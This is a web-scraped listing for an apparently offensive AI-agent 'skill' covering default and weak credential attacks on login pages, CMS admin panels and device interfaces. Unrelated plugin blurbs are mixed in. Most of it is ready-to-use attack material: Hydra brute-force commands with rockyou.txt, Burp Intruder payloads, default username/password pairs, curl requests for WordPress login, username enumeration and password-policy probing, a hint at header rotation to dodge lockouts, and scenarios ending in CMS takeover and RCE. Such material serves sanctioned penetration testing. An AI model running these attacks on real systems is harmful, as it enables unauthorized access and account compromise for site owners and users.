From meta
Identify and exploit default or weak credentials on web application login forms, admin panels, CMS backends (WordPress wp-admin, Joomla, Drupal), and embedded device management interfaces. Signals include framework fingerprinting (WhatWeb, Wappalyzer, Nikto), exposed admin paths from robots.txt/dirbusting, and weak password policy acceptance of "Password1" or "123456". Tools: Burp Suite Intruder, Hydra, Medusa, OWASP ZAP.
npx claudepluginhub securityfortech/hacking-skills --plugin metaThis skill uses the workspace's default tool permissions.
Web applications, CMS platforms, and network devices ship with documented default credentials
Guides Next.js Cache Components and Partial Prerendering (PPR) with cacheComponents enabled. Implements 'use cache', cacheLife(), cacheTag(), revalidateTag(), static/dynamic optimization, and cache debugging.
Guides building MCP servers enabling LLMs to interact with external services via tools. Covers best practices, TypeScript/Node (MCP SDK), Python (FastMCP).
Generates original PNG/PDF visual art via design philosophy manifestos for posters, graphics, and static designs on user request.
Web applications, CMS platforms, and network devices ship with documented default credentials that administrators frequently fail to change. Weak password policies that permit short, common, or non-complex passwords compound the risk by allowing brute-force and credential-stuffing attacks to succeed rapidly. When combined with exposed admin paths discovered through fingerprinting, the attack chain from reconnaissance to authenticated access can be trivially short.
/wp-admin/, /administrator/, /admin/, /manager/, /console/admin/admin, admin/password, admin/<blank>, root/rootweb-fingerprinting skill)./robots.txt Disallow entries; dirbust with framework-specific
wordlist; follow redirects from root path.# Hydra HTTP POST form brute-force
hydra -l admin -P /usr/share/wordlists/rockyou.txt TARGET http-post-form \
"/login:username=^USER^&password=^PASS^:Invalid credentials"
# Hydra HTTP Basic Auth
hydra -L users.txt -P passwords.txt TARGET http-get /admin/
# Burp Suite Intruder — set username/password fields as payload positions
# Payload list: admin, administrator, root, user, test, guest
# Password list: admin, password, 123456, Password1, <blank>
# Common default credential pairs to test manually
# admin:admin
# admin:password
# admin:1234
# admin:(blank)
# root:root
# administrator:administrator
# test:test
# guest:guest
# WordPress-specific
curl -X POST https://TARGET/wp-login.php \
-d "log=admin&pwd=admin&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1" \
-b "wordpress_test_cookie=WP+Cookie+check" -L -I | grep -E "HTTP|Location"
# Check for username enumeration via error message difference
curl -s -X POST https://TARGET/login \
-d "user=nonexistentuser12345&pass=wrongpass" | grep -i "invalid\|not found\|wrong"
curl -s -X POST https://TARGET/login \
-d "user=admin&pass=wrongpass" | grep -i "invalid\|not found\|wrong"
# Password policy probe
curl -X POST https://TARGET/register \
-d "username=testpolicyuser&password=123456&confirm=123456"
X-Forwarded-For header rotation.Scenario 1 — CMS Default Admin Credentials
Setup: WhatWeb identifies WordPress; /wp-admin/ returns login form.
Trigger: Try admin/admin; application grants access.
Impact: Full CMS admin control — content modification, plugin installation, RCE via theme editor.
Scenario 2 — Credential Spray on No-Lockout Login Setup: Login endpoint has no rate limiting or CAPTCHA; accepts unlimited attempts. Trigger: Spray top-10 passwords against enumerated usernames. Impact: Multiple accounts compromised; potential admin access.
Scenario 3 — Weak Policy Allows Trivially Guessable Passwords
Setup: Registration allows "Password1"; a user has set this.
Trigger: Username enumeration reveals jsmith@TARGET; spray with common passwords.
Impact: User account compromised via guessable password.
admin/admin with no redirect may be a honeypot or decoy form.Default credentials are a specific subset of [[auth-bypass]] — the same forced-browsing and parameter-tampering techniques apply once credentials are obtained. If the login endpoint lacks rate limiting, use [[password-reset-flaws]] to check whether the reset flow also permits credential guessing. The platform fingerprinting step that leads here is covered in [[web-fingerprinting]], which identifies the exact CMS version to cross-reference with known default credential databases.